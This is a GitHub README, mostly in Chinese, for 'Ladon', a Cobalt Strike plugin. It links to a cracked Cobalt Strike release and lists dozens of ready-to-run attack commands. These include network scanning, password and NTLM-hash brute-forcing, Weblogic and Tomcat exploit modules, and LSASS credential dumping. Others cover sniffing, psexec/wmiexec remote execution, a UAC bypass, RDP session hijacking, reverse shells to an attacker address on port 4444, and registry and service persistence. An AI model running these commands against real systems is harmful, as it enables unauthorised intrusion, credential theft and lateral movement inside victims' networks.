mcdulltii / Ladon_CobaltStrike

Cobalt Strike (Ladon)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Ladon 911 for Cobalt Strike

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

Ladon For Cobalt Strike

Cobalt Strike Cracked by k8gege

DownLoad: https://github.com/k8gege/Aggressor/releases/tag/cs

Cobalt Strike K8破解版

Cobalt Strike 4.4
Cobalt Strike 4.3
Cobalt Strike 3.13
Cobalt Strike 3.12

1.内置Windows版TeamServer.exe启动器 2.内置巨龙拉冬Ladon7.2中英文版插件

巨龙拉冬9.0: 让你的Cobalt Strike变成超级武器

9.0插件获取:https://mp.weixin.qq.com/s/GQBXCX1fiSLi6gKY3M-JcA

无图无真相

好了废话不多说上图,让我们看看Cobalt Strike 4.4巨龙拉冬插件功能

如果你熟悉Ladon命令的可以直接在Beacon上执行相应命令即可,如使用“Ladon GetID”命令查看目标机器名、机器ID、CPUID、硬盘ID、MAC地址等信息,主要用于区分一些大内网同名机器,或其它用途。若是你不熟悉可以使用右键菜单,为了方便新人或不太熟的人

如果不熟悉Ladon命令用法,也可以右键菜单,使用非常方便,只需选择模块填写目标参数如(IP、URL、域名、主机名、CIDR格式IP等),即可加载对应模块扫描或探测你想获取的信息,如探测C段存在MS17010漏洞的机器。

内网外网网络资产探测

操作系统信息探测

漏洞检测

网络密码审计

本机信息收集

横向移动、远程执行

权限提升、本地提权

程序简介

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.0版本内置83个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破12种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

使用文档

ID 主题 URL
0 Ladon完整文档 https://k8gege.org/Ladon

DownLoad

New Version:https://k8gege.org/Download
All Version: https://github.com/k8gege/Ladon/releases/

0.Cobalt Strike联动

前言

本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。

完整文档:http://k8gege.org/Ladon

资产扫描、指纹识别、服务识别、存活主机、端口扫描

001 多协议探测存活主机 (IP、机器名、MAC地址、制造商)

Ladon 192.168.1.8/24 OnlinePC

002 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)

Ladon 192.168.1.8/24 OsScan

003 扫描存活主机

Ladon 192.168.1.8/24 OnlineIP

004 ICMP扫描存活主机

Ladon 192.168.1.8/24 Ping

005 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)

Ladon 192.168.1.8/24 MS17010

006 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)

Ladon 192.168.1.8/24 SMBGhost

007 扫描Web信息/Http服务

Ladon 192.168.1.8/24 WebScan

008 扫描C段站点URL域名

Ladon 192.168.1.8/24 UrlScan

009 扫描C段站点URL域名

Ladon 192.168.1.8/24 SameWeb

010 扫描子域名、二级域名

Ladon baidu.com SubDomain

011 域名解析IP、主机名解析IP

Ladon baidu.com DomainIP Ladon baidu.com HostIP

012 域内机器信息获取

Ladon AdiDnsDump 192.168.1.8 (Domain IP)

013 扫描C段端口、指定端口扫描

Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389

014 扫描C段WEB以及CMS(75种Web指纹识别)

Ladon 192.168.1.8/24 WhatCMS

015 扫描思科设备

Ladon 192.168.1.8/24 CiscoScan Ladon http://192.168.1.8 CiscoScan

016 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)

Ladon EnumMssql

017 枚举网络共享资源 (域、存活IP、共享路径)

Ladon EnumShare

018 扫描LDAP服务器

Ladon 192.168.1.8/24 LdapScan

019 扫描FTP服务器

Ladon 192.168.1.8/24 FtpScan

暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html

020 445端口 SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

021 135端口 Wmi密码爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

022 389端口 LDAP服务器、AD域密码爆破(Windows)

Ladon 192.168.1.8/24 LdapScan

023 5985端口 Winrm密码爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan.ini

024 445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan

025 135端口 Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan

026 22端口 SSH密码爆破(Linux)

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

027 1433端口 Mssql数据库密码爆破

Ladon 192.168.1.8/24 MssqlScan

028 1521端口 Oracle数据库密码爆破

Ladon 192.168.1.8/24 OracleScan

029 3306端口 Mysql数据库密码爆破

Ladon 192.168.1.8/24 MysqlScan

030 7001端口 Weblogic后台密码爆破

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

031 5900端口 VNC远程桌面密码爆破

Ladon 192.168.1.8/24 VncScan

032 21端口 Ftp服务器密码爆破

Ladon 192.168.1.8/24 FtpScan

033 8080端口 Tomcat后台登陆密码爆破

Ladon 192.168.1.8/24 TomcatScan Ladon http://192.168.1.8:8080/manage TomcatScan

034 Web端口 401基础认证密码爆破

Ladon http://192.168.1.8/login HttpBasicScan

035 445端口 Impacket SMB密码爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini

036 445端口 IPC密码爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini

漏洞检测/漏洞利用/Poc/Exp

037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

Ladon 192.168.1.8/24 MS17010

038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc

039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)

Ladon 192.168.1.8/24 PhpStudyPoc

040 ActiveMQ漏洞检测(CVE-2016-3088)

Ladon 192.168.1.8/24 ActivemqPoc

041 Tomcat漏洞检测(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatPoc

042 Weblogic漏洞利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp

043 Tomcat漏洞利用(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatExp

044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

Ladon 192.168.1.8/24 Struts2Poc

FTP下载、HTTP下载

045 HTTP下载

Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

046 Ftp下载

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

加密解密(HEX/Base64)

047 Hex加密解密

Ladon 123456 EnHex Ladon 313233343536 DeHex

048 Base64加密解密

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64

网络嗅探

049 Ftp密码嗅探

Ladon FtpSniffer 192.168.1.5

050 HTTP密码嗅探

Ladon HTTPSniffer 192.168.1.5

051 网络嗅探

Ladon Sniffer

密码读取

052 读取IIS站点密码、网站路径

Ladon IISpwd

DumpLsass内存密码

Ladon DumpLsass

信息收集

053 进程详细信息

Ladon EnumProcess Ladon Tasklist

054 获取命令行参数

Ladon cmdline Ladon cmdline cmd.exe

055 获取渗透基础信息

Ladon GetInfo Ladon GetInfo2

056 .NET & PowerShell版本

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

057 运行时版本&编译环境

Ladon Ver Ladon Version

远程执行(psexec/wmiexec/atexec/sshexec)

445端口 PSEXEC远程执行命令(交互式)

net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system

058 135端口 WmiExec远程执行命令 (非交互式)

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

059 445端口 AtExec远程执行命令(非交互式)

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

060 22端口 SshExec远程执行命令(非交互式)

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

061 JspShell远程执行命令(非交互式)

Usage:Ladon JspShell type url pwd cmd Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

062 WebShell远程执行命令(非交互式)

Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

提权降权

063 BypassUac 绕过UAC执行,支持Win7-Win10

Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat

064 GetSystem 提权或降权运行程序

Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer

065 Runas 模拟用户执行命令

Ladon Runas user pass cmd

其它功能

066 一键启用.net 3.5

Ladon EnableDotNet

067 获取内网站点HTML源码

Ladon gethtml http://192.168.1.1

068 检测后门

Ladon CheckDoor Ladon AutoRun

069 获取本机内网IP与外网IP

Ladon GetIP

070 一键迷你WEB服务器

Ladon WebSer 80 Ladon web 80

反弹Shell

071 反弹TCP NC Shell

Ladon ReverseTcp 192.168.1.8 4444 nc

072 反弹TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

073 反弹TCP MSF MET Shell

Ladon ReverseTcp 192.168.1.8 4444 meter

074 反弹HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444

075 反弹HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444

076 反弹TCP CMD & PowerShell Shell

Ladon PowerCat -r 192.168.1.8 4444 cmd Ladon PowerCat -r 192.168.1.8 4444 psh

077 反弹UDP Cmd & PowerShell Shell

Ladon PowerCat -r 192.168.1.110 4444 cmd -u Ladon PowerCat -r 192.168.1.8 4444 psh -u

078 RDP桌面会话劫持(无需密码)

Ladon RDPHijack 3 Ladon RDPHijack 3 console

079 OXID定位多网卡主机

Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan

080 查看用户最近访问文件

Ladon Recent

081 添加注册表Run启动项

Ladon RegAuto Test c:\123.exe

082 AT计划执行程序(无需时间)(system权限)

Ladon at c:\123.exe Ladon at c:\123.exe gui

083 SC服务加启动项&执行程序(system权限)

Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName

工具下载

历史版本: https://github.com/k8gege/Ladon/releases

最新版

最新版在小密圈:http://k8gege.org/Ladon/update.txt

Stargazers over time

Stargazers over time

About

Cobalt Strike (Ladon)